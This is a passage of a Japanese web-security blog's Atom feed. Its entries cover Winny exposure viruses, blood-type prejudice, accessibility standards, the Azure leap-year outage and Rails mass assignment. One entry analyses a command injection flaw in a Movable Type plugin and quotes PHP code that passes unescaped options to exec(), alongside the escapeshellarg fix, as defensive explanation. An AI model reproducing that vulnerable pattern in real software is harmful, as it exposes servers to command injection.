class="domain-info">(jvn.jp)</em>」を見れば明らかだと思いますが、実際の運用では、対応不能な場合には未修正のまま公表されています。この制度はあくまで脆弱性関連情報の流通と公開タイミングをコントロールするためのものですし、取扱終了になったら情報が公開される前提です。</p><p>ちなみに、いわゆる暴露ウイルスはWinnyの脆弱性を利用しているわけではありません。感染は単にファイルを開いて実行した事によって起こりますので、Winny経由で取得した場合に限らず、不用意にファイルを開けば感染します。原理的には、ウィルスがWinnyをインストールしたり、ウィルスが自らWinnyプロトコルで通信するということも起こり得ますから、Winnyを使っていない人が添付ファイルを開いて感染、感染すると自らWinnyプロトコルで通信して暴露……というようなウィルスの出現も考えられます。</p><p>ここからは余談になりますが、Winny暴露ウィルスの最大の脅威は「Winnyネットワークを利用して情報がばらまかれるため回収不能になる」という点に尽きると思います。この特性はWinnyネットワークが存在し続ける限りなくならないと思いますし、Winnyネットワークを消滅させることは難しいでしょう。「脆弱性を修正したWinnyが出れば解決するはずだ」という議論はけっこう良く聞くのですが、それだけでは暴露ウィルスの問題は解決しないように思うのです。</p><p>ちょうど高木さんが「<a href="http://takagi-hiromitsu.jp/diary/20090111.html#p02">いいかげん流通させている輩を罰せないか</a> <em class="domain-info">(takagi-hiromitsu.jp)</em>」という日記を書かれていますが、こういう方向のアプローチしかないように思えるのですよね。</p><ul class="comment-link"><li><a href="../topic/3491/comment">「情報セキュリティ早期警戒パートナーシップにおいて修正がなされない場合の運用」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/Winny">Winny</a></span></p></div></div></content></entry><entry><title>ケツハラ</title><link href="http://bakera.jp/ebi/topic/3473" /><id>tag:bakera.jp,2008:/ebi/topic/3473</id><updated>2026-04-18T14:55:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2008/12/29">2008年12月29日(月曜日)</a></h1><div class="topic"><h2><a href="../topic/3473">ケツハラ</a></h2><p class="subinfo"><span class="updated">更新: 2026年4月18日14時55分頃</span></p><p><a href="http://www.st.ryukoku.ac.jp/~kjm/security/memo/2008/12.html#20081229__ketsu">セキュリティホールmemoで紹介</a> <em class="domain-info">(www.st.ryukoku.ac.jp)</em>されていた、「<a href="http://oku.edu.mie-u.ac.jp/~okumura/blog/node/2325#comment-20697">今年は血液型本が大ベストセラー</a> <em class="domain-info">(oku.edu.mie-u.ac.jp)</em>」というお話。</p><div class="quote-and-cite"><blockquote><p>2008-12-28朝7時台のNHKニュースで取り上げられていたが，その中で「血液型と性格は科学的には関係がない」という意味のことを女性アナが2回，男性アナが1回，計3回言っていた。さすがNHK！</p></blockquote></div><p>まあ、BPO (放送倫理・番組向上機構) から<a href="http://www.bpo.gr.jp/youth/decision/001-010/006_blood.html">「血液型を扱う番組」に対する要望</a> <em class="domain-info">(www.bpo.gr.jp)</em>というものが出ていますから、当然と言えば当然の対応なのでしょうね。</p><p>興味深かったのはコメント欄。</p><div class="quote-and-cite"><blockquote><p>ちなみに、血液型による性格診断などを信じている人から受ける非科学的な評価による不快感を「ケツハラ」というひとがいるそうです。</p></blockquote></div><p>血液型ハラスメント、略してケツハラですか。凄い略称ですね。</p><p>そういえば、少し前に<a href="http://sankei.jp.msn.com/entertainments/entertainers/081029/tnr0810290857004-n1.htm">市川團十郎が骨髄移植を受けて血液型が変わった</a> <em class="domain-info">(sankei.jp.msn.com)</em>という話がありましたが、</p><div class="quote-and-cite"><blockquote><p>Ｏ型になったことには「性格は変わってないと思うんですけど。まぁ、ちょっとは変わったかな」と完全復活をアピール。</p></blockquote></div><p>変わるわけ無いでしょうに、わざわざこんなコメントを出さなければならないという社会が何ともなぁ。</p><ul class="comment-link"><li><a href="../topic/3473/comment">「ケツハラ」へのコメント (1件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E6%80%9D%E3%81%A3%E3%81%9F%E3%81%93%E3%81%A8">思ったこと</a> / <a href="../genre/%E7%A7%91%E5%AD%A6">科学</a> / <a href="../genre/%E8%A1%80%E6%B6%B2%E5%9E%8B">血液型</a></span></p></div></div></content></entry><entry><title>bakera.jpシステムリニューアル その5</title><link href="http://bakera.jp/ebi/topic/3358" /><id>tag:bakera.jp,2008:/ebi/topic/3358</id><updated>2026-04-18T02:35:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2008/11/7">2008年11月7日(金曜日)</a></h1><div class="topic"><h2><a href="../topic/3358">bakera.jpシステムリニューアル その5</a></h2><p class="subinfo"><span class="updated">更新: 2026年4月18日2時35分頃</span></p><p>バグ対応続き。</p><ul><li><a href="../backnumber">日記バックナンバー</a>のパンくずリストがちゃんと出ていなかった問題を修正</li><li><a href="../genre/%E3%82%A2%E3%83%B3%E3%83%AA%E3%83%9F%E3%83%86%E3%83%83%E3%83%89%EF%BC%9A%E3%82%B5%E3%82%AC">話題「アンリミテッド：サガ」を含むえび日記</a>が見られなかった問題を修正</li></ul><p>「:」が含まれるキーワードをクリックするとBad Requestになるという罠が。</p><p>URLのPATH_INFO相当の箇所に「%3a」が含まれていると、それだけでBad Requestになります。これはhatomaru.dllの問題ではなく、IIS+ASP.NETの問題です。ASP.NETなサイトで /default.aspx/%3a みたいなものをリクエストすると、それだけでBad Requestになるはずです。アプリケーションが値を受け取る前に蹴られてしまうのでどうしようもありません。</p><p>仕方ないので、URLに「%3a」ではなく「%EF%BC%9A」を入れるというバカっぽい対応を行いました。いかにも頭の悪い<dfn class="glossary"><a href="../../glossary/%E3%82%B5%E3%83%8B%E3%82%BF%E3%82%A4%E3%82%BA">サニタイズ</a></dfn>という感じがしてしまいますが……。</p><ul class="comment-link"><li><a href="../topic/3358/comment">「bakera.jpシステムリニューアル その5」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/bakera.jp">bakera.jp</a> / <a href="../genre/hatomaru.dll">hatomaru.dll</a></span></p></div></div></content></entry><entry><title>Japan Accessibility Conference vol.1で登壇しました</title><link href="http://bakera.jp/ebi/topic/4918" /><id>tag:bakera.jp,2008:/ebi/topic/4918</id><updated>2017-11-14T18:20:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2017/11/11">2017年11月11日(土曜日)</a></h1><div class="topic"><h2><a href="../topic/4918">Japan Accessibility Conference vol.1で登壇しました</a></h2><p class="subinfo"><span class="updated">更新: 2017年11月14日18時20分頃</span></p><p>Accessibilityという単語は長いのでa11yと略記されることがありますが、その兼ね合いで、11月11日はアクセシビリティの日なのだそうです。</p><p>ということで、「日本最大級のアクセシビリティイベント」と称して<a href="https://connpass.com/event/68762/">Japan Accessibility Conference vol.1</a> <em class="domain-info">(connpass.com)</em>が開催されました。私は「アクセシビリティ・ガイドラインの歩き方（初心者編）」というセッションで登壇しています。スライドと動画を以下で見ることができます。</p><ul><li>スライド: <a href="https://docs.google.com/presentation/d/1U74164uPJsHQU12OcAeZPVwfwCzAWJy6hSPZyCxG8kM/edit?usp=sharing">Japan Accessibility Conference vol.1 アクセシビリティ・ガイドラインの歩き方（初心者編）</a> <em class="domain-info">(docs.google.com)</em></li><li>動画: <a href="https://freshlive.tv/tech-conference/168860">[Room A] Japan Accessibility Conference vol.1</a> <em class="domain-info">(freshlive.tv)</em> (該当のセッションは2:27:50あたりから)</li></ul><p>参加者のみなさんのツイートなどは以下にまとめていただいているようです。</p><ul><li><a href="https://togetter.com/li/1170844">Japan Accessibility Conference vol.1(Room A編)</a> <em class="domain-info">(togetter.com)</em></li></ul><p>ご来場いただいたみなさま、配信でご覧いただいたみなさま、ありがとうございました。</p><div class="section"><h3 id="section1">セッションの補足</h3><p>以下、セッション内容についてひとつ補足。</p><p>JIS X 8341-3:2010には日本独自の内容があり、JIS X8341-3:2016ではそれをなくして完全一致規格にしたと説明していますが、このときカットした内容は附属書として残っています。つまり、規定ではなくなりましたが、参考情報としては残っている状態です。この附属書はネットでは公開されていませんので、読みたい場合は規格票を購入する必要があります。とはいえ、自治体系案件でAA準拠必須、というような場合でもなければ、無理に読む必要はないでしょう。</p><p class="note">※2017-11-14追記: アクセシブルではないものの、<a href="http://www.jisc.go.jp/index.html">JISC(日本工業標準調査会)のサイト</a> <em class="domain-info">(www.jisc.go.jp)</em>でJIS X 8341-3:2016の規格票を閲覧できるというご指摘をいただきました。ご指摘ありがとうございます。</p></div><div class="section"><h3 id="section2">ご質問、ご感想などへのコメント</h3><p>Twitterなどでコメント等をくださったみなさま、ありがとうございます。いくつかここでコメントしておきます。</p><dl><dt>Q. 「無職」と言うときにすごく嬉しそうですね?</dt><dd><p>悲壮感を漂わせて言うとシャレになりませんので!</p></dd><dt>Q. 「干渉4兄弟」という言葉は初めて聞きましたが?</dt><dd><p>正式な言葉ではなく、単に私がそう呼んでみたというだけです。正式の用語ではない旨、補足するべきだったかもしれません。</p></dd><dt>Q. スクロールすると動くアニメーションも「干渉」になる?</dt><dd><p>ユーザーが停止できれば良いので、スクロールを止めたときに動きが止まるような場合は問題ありません。動き続けて止められない場合は問題になります。</p></dd></dl></div><p>ひとまずこんなところで。</p><ul class="comment-link"><li><a href="../topic/4918/comment">「Japan Accessibility Conference vol.1で登壇しました」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/%E3%82%A2%E3%82%AF%E3%82%BB%E3%82%B7%E3%83%93%E3%83%AA%E3%83%86%E3%82%A3">アクセシビリティ</a> / <a href="../genre/%E8%AC%9B%E6%BC%94">講演</a></span></p></div></div></content></entry><entry><title>「ケータイキット for Movable Type」のOSコマンドインジェクションの修正</title><link href="http://bakera.jp/ebi/topic/4911" /><id>tag:bakera.jp,2008:/ebi/topic/4911</id><updated>2016-04-27T11:05:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2016/4/26">2016年4月26日(火曜日)</a></h1><div class="topic"><h2><a href="../topic/4911">「ケータイキット for Movable Type」のOSコマンドインジェクションの修正</a></h2><p class="subinfo"><span class="updated">更新: 2016年4月27日11時5分頃</span></p><p>Movable Typeのプラグイン「ケータイキット for Movable Type」にOSコマンドインジェクションの脆弱性があったという話が出ており、J-WAVEの64万件の個人情報流出はこれが原因だったとされています。</p><ul><li><a href="http://itpro.nikkeibp.co.jp/atcl/news/16/042301210/">J-WAVEでも64万件の個人情報流出の可能性、原因ソフトの利用者は至急パッチ適用を</a> <em class="domain-info">(itpro.nikkeibp.co.jp)</em></li><li><a href="http://internet.watch.impress.co.jp/docs/news/20160425_754960.html">「ケータイキット for Movable Type」にOSコマンドインジェクションの脆弱性、利用者は修正バージョンへアップデートを、すでにJ-WAVEへの攻撃で悪用</a> <em class="domain-info">(internet.watch.impress.co.jp)</em></li><li><a href="http://d.hatena.ne.jp/Kango/20160423/1461418149">ケータイキット for Movable Type の脆弱性についてまとめてみた</a> <em class="domain-info">(d.hatena.ne.jp)</em></li></ul><p>配布元のアイデアマンズからは、4月22日にまず「緊急パッチファイル」が提供され、その後正式なアップデートが提供されました。</p><ul><li><a href="https://www.ideamans.com/release/20160422/">[2016-04-22]緊急パッチファイルの提供を開始</a> <em class="domain-info">(www.ideamans.com)</em></li><li><a href="https://www.ideamans.com/release/20160423/">[重要] ケータイキット for Movable Type 1.65 の提供を開始</a> <em class="domain-info">(www.ideamans.com)</em></li><li><a href="https://www.ideamans.com/release/20160425/">【重要】ケータイキット for Movable Typeの脆弱性をチェックする「KeitaiKit セキュリティチェック」プラグインを公開、[購入者向け]ケータイキットの脆弱性対策 特設ページを開設 </a> <em class="domain-info">(www.ideamans.com)</em></li></ul><p>サイトでの情報提供のほか、登録ユーザーへのメールでの告知も行われているようです。</p><p>22日に公開された「緊急パッチファイル」の内容を見ると、plugins/keitaikit/php/KeitaiGraphic.php というファイルひとつだけであり、このファイルに問題のあったコードが含まれているらしいことが分かります。中身を見ると、KeitaiGraphic という名前の示すとおり、画像をケータイ用に変換する関連の処理が含まれているようです。</p><p class="note">※Movable TypeはPerlで書かれており、プラグインも基本はPerlで書くのですが、ケータイキットはPerlとPHPが混ざった構成になっています。Perlで書かれたMTプラグインでHTMLにPHPのコードを吐いたりしつつ、画像変換などの処理はPHPで行っているようです。</p><p>修正の内容ですが、以下のような部分が、</p><div class="sample"><pre>
    $execute = "$convert $option $src $dest_temp";
    exec($execute);
</pre></div><p>「緊急パッチファイル」では以下のように修正されています (この他にも同様の修正が数箇所あります)。</p><div class="sample"><pre>
global $mtkk_no_exec_args_quote;
if ( $mtkk_no_exec_args_quote ) {
    $execute = "$convert $option $src $dest_temp";
} else {
    $execute = "$convert $option \"$src\" \"$dest_temp\"";
}
exec($execute);
</pre></div><p class="note">※細かいところを説明しておきますと、$convert はGraphicConfig.phpという設定ファイルで与えられた定数で、ImageMagickのconvertコマンドのパスが格納されます (デフォルトでは'/usr/bin/convert'がセットされています)。$mtkk_no_exec_args_quoteは、trueをセットすると従来どおりの (脆弱な) 挙動になるフラグと思われますが、特にセットしている箇所が見当たりませんので、基本的にはelse節の方が実行されて修正後の挙動となります。</p><p>一見して分かると思いますが、この修正内容は不十分であり、OSコマンドインジェクションの危険性はなくなっていないものと思われます。ただし、これはあくまで22日の時点で配布された「緊急パッチファイル」の内容です。配布元ではその後、23日に修正版をリリースし、あわせて以下のようにアナウンスしています。</p><div class="quote-and-cite"><blockquote cite="https://www.ideamans.com/release/20160423/"><p>ケータイキット for Movable Type で確認されたセキュリティ問題の修正バージョンとして、ケータイキット for Movable Type 1.65 の提供を開始します。すべてのケータイキット for Movable Type ユーザーは、修正版に必ずアップグレードしてください。</p><p>※1.641用の緊急パッチファイルを適用された場合でも、必ずアップグレードをしてください。</p></blockquote><p class="cite">以上、<a href="https://www.ideamans.com/release/20160423/">[重要] ケータイキット for Movable Type 1.65 の提供を開始</a> より</p></div><p>「緊急パッチファイル」のままでは駄目だという旨が告知されていますね。修正版の内容を見ると、該当箇所は最終的に以下のような形になったようです。</p><div class="sample"><pre>
global $mtkk_no_exec_args_quote;
if ( $mtkk_no_exec_args_quote ) {
    $execute = "$convert $option $src $dest_temp";
} else {
    $execute = "$convert $option " . escapeshellarg($src) . " " . escapeshellarg($dest_temp);
}
</pre></div><p>結論としては、配布元でアナウンスされているとおり、「緊急パッチ」を適用していても修正版にアップデートする必要がある、ということで良いと思います。</p><p class="note">※以下、2016-04-26 12:15頃追記</p><p>「なぜImageMagickのconvertコマンドを呼んでいるのだろうか」という疑問を感じた方が多かったようですので、一点補足します。設定ファイルGraphicConfig.phpには以下のような内容が書かれていて、ImageMagickではなくGDを選択することもできるように見えます。ただし初期値はImageMagickのようです。GDを選ぶと問題が回避できるのかどうかは良くわかりません。</p><div class="sample"><p>/*<br /> グラフィックライブラリ<br /> gd:GD<br /> im:ImageMagick 6+<br /> im5: ImageMagick 5)<br />*/<br />$kg-&gt;php_graphic = 'im';<br />/*<br /> convertコマンドのパス<br /> グラフィックライブラリにImageMagickを指定した場合のみ<br />*/<br />$kg-&gt;convert = '/usr/bin/convert';<br />/*<br /> identifyコマンドのパス<br /> グラフィックライブラリにImageMagickを指定した場合のみ<br />*/<br />$kg-&gt;identify = '/usr/bin/identify';</p></div><p class="note">※以下、2016-04-27 11:05頃追記</p><p>徳丸さんから情報をいただきました。攻撃経路はファイル名ではなくオプションの方らしいとのこと。</p><blockquote class="twitter-tweet" data-lang="ja"><p lang="ja" dir="ltr" xml:lang="ja"><a href="https://twitter.com/bakera">@bakera</a> <em class="domain-info">(twitter.com)</em> ばけらさん、私もソースを追っかけてみたのですが、攻撃経路はファイル名ではなく、オプションの方だと思います。ファイル名は存在チェックがあり攻撃が難しいですが、オプションはほぼノーチェックでconvertコマンド等に渡されていたようです</p>— 徳丸 浩 (@ockeghem) <a href="https://twitter.com/ockeghem/status/725127281488830464">2016年4月27日</a> <em class="domain-info">(twitter.com)</em></blockquote><p>あらためて確認すると、旧版、および緊急パッチファイルで以下のようになっていた部分が、</p><div class="sample"><pre>
    $option .= ' -rotate ' . $options['rotate'];
</pre></div><p>最新版では以下のように変更されています (同様の箇所が他にも数箇所あります)。</p><div class="sample"><pre>
    $option .= ' -rotate ' . escapeshellarg($options['rotate']);
</pre></div><p>この部分は「緊急パッチファイル」では変更されていなかった部分ですので、ここが攻撃経路なのであれば、緊急パッチファイルは修正が不十分 (従来の攻撃は防げるが、別の攻撃方法が残っている状態) だったのではなく、そもそも修正になっていなかった可能性もあります。いずれにしても、緊急パッチファイルのままでは駄目で、最新版にする必要があるという結論は変わりません。</p><ul class="comment-link"><li><a href="../topic/4911/comment">「「ケータイキット for Movable Type」のOSコマンドインジェクションの修正」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a></span></p></div></div></content></entry><entry><title>アクセシビリティキャンプ東京 #4</title><link href="http://bakera.jp/ebi/topic/4886" /><id>tag:bakera.jp,2008:/ebi/topic/4886</id><updated>2013-09-16T11:20:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2013/1/25">2013年1月25日(金曜日)</a></h1><div class="topic"><h2><a href="../topic/4886">アクセシビリティキャンプ東京 #4</a></h2><p class="subinfo"><span class="updated">更新: 2013年9月16日11時20分頃</span></p><p><a href="https://www.facebook.com/events/230227743775695/">アクセシビリティキャンプ東京 #4</a> <em class="domain-info">(www.facebook.com)</em>が開催されました。</p><p>テーマは「アクセシビリティのブランディング」(と、公式には書いてありますが「Webアクセシビリティのリブランディング」と言っていたような気もします。意味的には大差ありませんが)。</p><p>以下関連。</p><ul><li><a href="http://www.slideshare.net/kazuhito/20130125-a11ycamptokyo">アクセシビリティキャンプ東京 #4 開催にあたり</a> <em class="domain-info">(www.slideshare.net)</em></li><li><a href="http://togetter.com/li/445751">第4回アクセシビリティキャンプ東京</a> <em class="domain-info">(togetter.com)</em></li><li><a href="http://sho.tdiary.net/20130125.html#p01">アクセシビリティキャンプ東京#4を開催した</a> <em class="domain-info">(sho.tdiary.net)</em></li><li><a href="http://kidachi.kazuhi.to/blog/archives/037688.html">韓国のWebアクセシビリティ動向（または「第4回アクセシビリティキャンプ東京 その3」）</a> <em class="domain-info">(kidachi.kazuhi.to)</em></li></ul><p>個人的には、韓国のアクセシビリティ事情の話が非常に興味深いと思いました。韓国では民間企業に対しても強制力のある法律があって対応が進んでいるということで、政府機関に対してもガイドラインしかない日本とはかなり状況が違うということのようです。なぜ日本では法整備が進まないのか、という話題にもなりましたが、なんとも。国民の意識の違いなのでしょうか……?</p><ul class="comment-link"><li><a href="../topic/4886/comment">「アクセシビリティキャンプ東京 #4」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%A2%E3%82%AF%E3%82%BB%E3%82%B7%E3%83%93%E3%83%AA%E3%83%86%E3%82%A3">アクセシビリティ</a></span></p></div></div></content></entry><entry><title>Content-Languageでコンテント・ネゴシエーションを行うことができるのか?</title><link href="http://bakera.jp/ebi/topic/4772" /><id>tag:bakera.jp,2008:/ebi/topic/4772</id><updated>2012-06-03T14:25:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2012/4/17">2012年4月17日(火曜日)</a></h1><div class="topic"><h2><a href="../topic/4772">Content-Languageでコンテント・ネゴシエーションを行うことができるのか?</a></h2><p class="subinfo"><span class="updated">更新: 2012年6月3日14時25分頃</span></p><p><a href="http://waic.jp/">ウェブアクセシビリティ基盤委員会</a> <em class="domain-info">(waic.jp)</em>のサイトには、「<a href="http://waic.jp/docs/wcag2/techs.html">WCAG 2.0 実装方法集</a> <em class="domain-info">(waic.jp)</em>」という文書があります。これは<a href="http://www.w3.org/TR/WCAG20-TECHS/">Techniques for WCAG 2.0</a> <em class="domain-info">(www.w3.org)</em>を和訳したものです。</p><p>WCAG2.0の本体には、達成するべき基準が書かれているのですが、内容は抽象的で、具体的な実装方法までは書かれていません。たとえば、「利用者に提示されるすべての非テキストコンテンツには，同等の目的を果たす代替テキストを提供しなければならない」と規定されていても、それを具体的にどのような実装にすれば良いのかまでは書かれていません。それでは分からないので、具体的な実装方法は別のドキュメントにまとめられています。それがTechniques for WCAG2.0です。</p><p>このように文書が分けられている理由はいくつかあります。WCAG2.0が特定の技術 (たとえばHTML) に依存しない、汎用的な基準を定めることを目指したという点もありますが、本体はW3C Recommendationなので、頻繁な更新ができないという事情もあります。Recommendationの更新には時間がかかるので、新しい技術の出現に対応することが難しいわけです。Techniquesの方はNoteになっていて、それなりの頻度で更新できるようになっています。</p><p>つまりどういうことかというと、Techniques for WCAG 2.0はそれなりの頻度で更新されるということです。現在のTechniquesは2012年1月版となっています。しかし、和訳の方は2008年12月版のままで、かなり古くなってしまっています。</p><p>というようなわけで、新たに追加された項目をチェックしていたのですが、実装方法にSVR5というものが増えています。</p><ul><li><a href="http://www.w3.org/TR/WCAG20-TECHS/SVR5.html">SVR5: Specifying the default language in the HTTP header</a> <em class="domain-info">(www.w3.org)</em></li></ul><p>IDの「SVR」は "Server" の意味で、SVR5はサーバ側の実装例の5番目のものという意味です。SVR5では、HTTP応答ヘッダのContent-Languageで言語を指定するというテクニックが紹介されています。そこまではまあ良いのですが、読んでみると微妙な記述が……。</p><div class="quote-and-cite"><blockquote cite="http://www.w3.org/TR/2012/NOTE-WCAG20-TECHS-20120103/SVR5.html"><p>Content-Language HTTP header can contain a list of one or more language codes, which can be used for language negotiation between a user agent and a server. If the language preferences in a user agent are set correctly, language negotiation can help the user to find a language version of the content that suits his/her preferences.</p></blockquote><p class="cite">以上、<a href="http://www.w3.org/TR/2012/NOTE-WCAG20-TECHS-20120103/SVR5.html">SVR5: Specifying the default language in the HTTP header (2012年1月3日版)</a> より</p></div><p>"can be used for language negotiation between a user agent and a server" とあり、Content-Languageを言語によるコンテント・ネゴシエーションに使うことができると書いてあるように読めます。しかし、Content-Languageをコンテント・ネゴシエーションに使うというのは聞いたことがありません。</p><p>普通、ネゴシエーションに使われるのは、ユーザーエージェントのHTTP要求ヘッダに入っているAccept-Languageです。サーバは、ネゴシエーションにAccept-Languageが使われていることを明示するために、Vary: Accept-Languageをつけて応答することがありますが、Content-Languageは使われません。サーバは300 Multiple Choisesや406 Not Acceptableで応答することがあり、このときはユーザーエージェントの側に選択がゆだねられますが、ここでもContent-Languageがネゴシエーションに使われるわけではありません。</p><p>無理矢理考えると、サーバからマルチパートで複数の言語を含んだ応答をして、それぞれのパートにContent-Languageをつけておけば選択できるような気もしますが、それはネゴシエーションとは言わないと思います……。</p><p>というわけで、この記述は何かが間違っているのではないかという気がしていますが、あるいは私が知らないネゴシエーション方法があるのかもしれません。</p><p>ではContent-Languageは何の役に立つのかというと、HTMLの場合は<dfn class="element"><a href="../../ref/html/element/html">html要素</a></dfn>に<dfn class="element"><a href="../../ref/html/attribute/lang">lang属性</a></dfn>をつけてやれば良いので、Content-Languageの出番はあまりありません。しかし、HTTPで転送されるのはHTMLだけではありません。プレーンテキストやダウンロードデータなどの場合、データ自身に言語を指定する機能はありませんので、HTTP応答ヘッダでの指定が意味を持ちます。</p><p>RFC2616の14.12 Content-Language には以下のような記述があります。</p><div class="quote-and-cite"><blockquote cite="urn:ietf:rfc:2616#section-14.12"><p>The primary purpose of Content-Language is to allow a user to identify and differentiate entities according to the user's own preferred language.</p></blockquote><p class="cite">以上、<a href="http://tools.ietf.org/html/rfc2616#section-14.12">RFC2616 14.12 Content-Language</a> より</p></div><p>ここでは、ユーザーが設定した優先言語と違うかどうか識別できると言っています。たとえば、ユーザーの優先言語と違っていたら「このコンテンツは英語ですが自動翻訳しますか?」というアラートを出すブラウザがあります。HTML以外のコンテンツであっても、Content-Languageの指定があれば、そういった挙動ができるようになるかもしれません。</p><p class="note">※2012-06-03追記: 結局、訳注をつけて公開しました: 「<a href="http://waic.jp/docs/WCAG-TECHS/SVR5.html">SVR5: HTTPヘッダーで主たる自然言語を指定する</a> <em class="domain-info">(waic.jp)</em>」。</p><ul class="comment-link"><li><a href="../topic/4772/comment">「Content-Languageでコンテント・ネゴシエーションを行うことができるのか?」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/%E3%82%A2%E3%82%AF%E3%82%BB%E3%82%B7%E3%83%93%E3%83%AA%E3%83%86%E3%82%A3">アクセシビリティ</a> / <a href="../genre/HTTP">HTTP</a></span></p></div></div></content></entry><entry><title>Windows Azure, 閏年問題でダウン</title><link href="http://bakera.jp/ebi/topic/4732" /><id>tag:bakera.jp,2008:/ebi/topic/4732</id><updated>2012-03-15T14:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2012/3/1">2012年3月1日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/4732">Windows Azure, 閏年問題でダウン</a></h2><p class="subinfo"><span class="updated">更新: 2012年3月15日14時0分頃</span></p><p>こんなニュースが……「<a href="http://www.itmedia.co.jp/news/articles/1203/01/news038.html">Microsoftの「Windows Azure」、閏年関連バグでダウン</a> <em class="domain-info">(www.itmedia.co.jp)</em>」。</p><p>実はうちの会社でもWindows Azureを使った案件をいくつか持っていて、思いっきり影響を受けました。日本時間の朝10時頃からサービスがダウンし、管理画面からの再起動も受け付けない状態に。しかも、社内で最も詳しい人は「<a href="http://www.2012mvpsummit.com/default.aspx">2012 MVP Global Summit</a> <em class="domain-info">(www.2012mvpsummit.com)</em>」に呼ばれていて、日本にいないという厳しい事態。</p><p>幸いメールで連絡がついて、しかもすぐそばにAzureのMVPの方がいたらしく、むしろ通常よりも強力なサポートが得られる結果になりました……が、結論としては「Azure全体の障害なのでどうしようもない」という話で、座して待つ形に。</p><p class="note">※日本時間で夜の21時頃には復旧していたようです。</p><p>……というようなことが起きたのですが、それがまさかの閏年問題だったようで。正式な障害報告書はまだ見ていませんが、Microsoftの方からの簡単な報告によると、証明書関係の処理で問題が起き、障害の範囲拡大を防ぐためにサービスを停止したということらしいです。</p><p>証明書の有効期限チェックの処理で閏年問題が発生したのだとすると、それはまあ動かなくなるでしょう。Azureの内部ではいろいろなところで証明書を使っているようですし、証明書のチェックは一見するとカレンダーとは関係なさそうに見えるところで、盲点になっていたのかもしれません。</p><p>Azureに限らず、証明書や鍵の有効期限をチェックするシチュエーションは増えていると思います。そこで問題が出ると影響が大きいので、注意する必要がありそうですね。</p><p class="note">※2012-03-15追記: 有効期限のチェックで問題が起きたのではなく、証明書の新規作成に失敗したということのようです……「<a href="../4745">Azure閏年問題の詳細</a>」。</p><ul class="comment-link"><li><a href="../topic/4732/comment">「Windows Azure, 閏年問題でダウン」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/%E3%83%97%E3%83%AD%E3%82%B0%E3%83%A9%E3%83%9F%E3%83%B3%E3%82%B0">プログラミング</a> / <a href="../genre/%E5%87%BA%E6%9D%A5%E4%BA%8B">出来事</a></span></p></div></div></content></entry><entry><title>Railsのupdate_attributesが強力な話</title><link href="http://bakera.jp/ebi/topic/4735" /><id>tag:bakera.jp,2008:/ebi/topic/4735</id><updated>2012-03-12T22:15:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2012/3/5">2012年3月5日(月曜日)</a></h1><div class="topic"><h2><a href="../topic/4735">Railsのupdate_attributesが強力な話</a></h2><p class="subinfo"><span class="updated">更新: 2012年3月12日22時15分頃</span></p><p>こんな話が……「<a href="http://blog.sorah.jp/2012/03/05/mass-assignment-vulnerability-in-github">github の mass assignment 脆弱性が突かれた件</a> <em class="domain-info">(blog.sorah.jp)</em>」。</p><div class="quote-and-cite"><blockquote><p>update_attributes とは: ActiveRecord のモデルで、カラム名がキーとなった Hash を渡す事でデータを更新できるメソッド。foo.update_attributes(:title =&gt; "New Title") のように使います。 scaffold で生成されたコントローラの update アクションなどで使われていて、scaffold では update_attributes(params[:foo]) のようにパラメータが直接渡されています。</p></blockquote></div><p>ここでのparamsは、クエリ文字列、あるいはPOSTされたクエリをそのまま格納したものです。scaffold (Railsが最初にひな形を自動生成する機能) では、外部から受け取ったクエリをそのまま渡すコードになっていて、書き換えずにそのまま使うとまずいことが起きるという話ですね。</p><p>で、実際にGitHubがやってしまっていたと。</p><p>ひとまずはプログラマが気をつければ良いという話ではあるのですが、scaffoldのままだと駄目というのはなんとも……。要注意ですね。</p><ul class="comment-link"><li><a href="../topic/4735/comment">「Railsのupdate_attributesが強力な話」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/Ruby">Ruby</a></span></p></div></div></content></entry><entry><title>meta refreshの解釈の差異によって発生する問題</title><link href="http://bakera.jp/ebi/topic/4733" 